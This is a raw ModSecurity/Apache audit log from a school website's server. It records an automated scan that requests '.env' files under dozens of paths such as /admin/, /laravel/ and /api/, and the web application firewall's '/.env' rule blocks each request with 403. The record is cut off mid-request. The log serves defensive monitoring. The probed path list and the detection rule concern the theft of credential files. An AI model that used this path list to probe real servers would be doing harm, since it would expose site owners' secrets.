ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902171619 765 (- - -) Stopwatch2: 1745151902171619 765; combined=303, p1=256, p2=0, p3=0, p4=0, p5=47, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04575f50-Z-- --80ac107c-A-- [20/Apr/2025:19:25:02 +0700] aATnnsTCDeBrh52UaHS-SAAAAJg 103.236.140.4 38316 103.236.140.4 8181 --80ac107c-B-- GET /apps/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --80ac107c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80ac107c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902257378 955 (- - -) Stopwatch2: 1745151902257378 955; combined=397, p1=326, p2=0, p3=0, p4=0, p5=70, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80ac107c-Z-- --09cc063f-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1AAAAMs 103.236.140.4 38318 103.236.140.4 8181 --09cc063f-B-- GET /uploads/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --09cc063f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09cc063f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902343852 850 (- - -) Stopwatch2: 1745151902343852 850; combined=311, p1=265, p2=0, p3=0, p4=0, p5=46, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09cc063f-Z-- --a23a4c31-A-- [20/Apr/2025:19:25:02 +0700] aATnnlTf0pL9EQC7JDUZ1wAAAEk 103.236.140.4 38320 103.236.140.4 8181 --a23a4c31-B-- GET /sitemaps/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a23a4c31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a23a4c31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902414833 766 (- - -) Stopwatch2: 1745151902414833 766; combined=284, p1=248, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a23a4c31-Z-- --009fa32c-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NoQAAABE 103.236.140.4 38322 103.236.140.4 8181 --009fa32c-B-- GET /site/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --009fa32c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --009fa32c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902485951 923 (- - -) Stopwatch2: 1745151902485951 923; combined=395, p1=349, p2=0, p3=0, p4=0, p5=46, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --009fa32c-Z-- --c0ef0745-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1QAAANU 103.236.140.4 38324 103.236.140.4 8181 --c0ef0745-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --c0ef0745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0ef0745-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902565224 759 (- - -) Stopwatch2: 1745151902565224 759; combined=271, p1=228, p2=0, p3=0, p4=0, p5=43, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0ef0745-Z-- --cc5da622-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1gAAANI 103.236.140.4 38326 103.236.140.4 8181 --cc5da622-B-- GET /web/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cc5da622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc5da622-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902638142 645 (- - -) Stopwatch2: 1745151902638142 645; combined=260, p1=233, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc5da622-Z-- --e5846232-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NogAAAAA 103.236.140.4 38328 103.236.140.4 8181 --e5846232-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --e5846232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5846232-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902707868 732 (- - -) Stopwatch2: 1745151902707868 732; combined=332, p1=222, p2=0, p3=0, p4=0, p5=110, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5846232-Z-- --14cad354-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NowAAABc 103.236.140.4 38330 103.236.140.4 8181 --14cad354-B-- GET /resources/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --14cad354-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14cad354-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902778738 714 (- - -) Stopwatch2: 1745151902778738 714; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14cad354-Z-- --fa882275-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1wAAANM 103.236.140.4 38332 103.236.140.4 8181 --fa882275-B-- GET /sistema/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --fa882275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa882275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902849086 739 (- - -) Stopwatch2: 1745151902849086 739; combined=312, p1=276, p2=0, p3=0, p4=0, p5=36, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa882275-Z-- --2a765e66-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr2AAAANA 103.236.140.4 38334 103.236.140.4 8181 --2a765e66-B-- GET /en/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --2a765e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a765e66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902921201 741 (- - -) Stopwatch2: 1745151902921201 741; combined=326, p1=294, p2=0, p3=0, p4=0, p5=31, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a765e66-Z-- --349f071c-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr2QAAAM8 103.236.140.4 38336 103.236.140.4 8181 --349f071c-B-- GET /tools/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --349f071c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --349f071c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902995702 694 (- - -) Stopwatch2: 1745151902995702 694; combined=257, p1=215, p2=0, p3=0, p4=0, p5=42, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --349f071c-Z-- --3c8a3448-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr2gAAANY 103.236.140.4 38338 103.236.140.4 8181 --3c8a3448-B-- GET /clientes/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3c8a3448-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c8a3448-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903070672 651 (- - -) Stopwatch2: 1745151903070672 651; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c8a3448-Z-- --ce606672-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr2wAAAMI 103.236.140.4 38340 103.236.140.4 8181 --ce606672-B-- GET /clientes/laravel_inbox/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ce606672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce606672-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903142362 721 (- - -) Stopwatch2: 1745151903142362 721; combined=264, p1=221, p2=0, p3=0, p4=0, p5=42, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce606672-Z-- --6fb5b330-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3AAAAMM 103.236.140.4 38342 103.236.140.4 8181 --6fb5b330-B-- GET /clientes/laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6fb5b330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb5b330-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903216659 681 (- - -) Stopwatch2: 1745151903216659 681; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb5b330-Z-- --999ad00d-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3QAAANQ 103.236.140.4 38344 103.236.140.4 8181 --999ad00d-B-- GET /v1/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --999ad00d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --999ad00d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903287517 652 (- - -) Stopwatch2: 1745151903287517 652; combined=245, p1=213, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --999ad00d-Z-- --d7034f25-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3gAAAMo 103.236.140.4 38346 103.236.140.4 8181 --d7034f25-B-- GET /administrator/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d7034f25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7034f25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903357846 774 (- - -) Stopwatch2: 1745151903357846 774; combined=315, p1=283, p2=0, p3=0, p4=0, p5=32, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7034f25-Z-- --23ea1c7a-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3wAAAMA 103.236.140.4 38348 103.236.140.4 8181 --23ea1c7a-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --23ea1c7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23ea1c7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903428125 659 (- - -) Stopwatch2: 1745151903428125 659; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23ea1c7a-Z-- --ad8c5f22-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4AAAANc 103.236.140.4 38350 103.236.140.4 8181 --ad8c5f22-B-- GET /website/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ad8c5f22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad8c5f22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903505110 662 (- - -) Stopwatch2: 1745151903505110 662; combined=270, p1=237, p2=0, p3=0, p4=0, p5=32, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad8c5f22-Z-- --0ebf2708-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4QAAAMg 103.236.140.4 38352 103.236.140.4 8181 --0ebf2708-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --0ebf2708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ebf2708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903576982 769 (- - -) Stopwatch2: 1745151903576982 769; combined=336, p1=292, p2=0, p3=0, p4=0, p5=44, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ebf2708-Z-- --77867956-A-- [20/Apr/2025:19:25:03 +0700] aATnn1u16wJWB6g0mU8NpAAAAA8 103.236.140.4 38354 103.236.140.4 8181 --77867956-B-- GET /local/.env HTTP/1.0 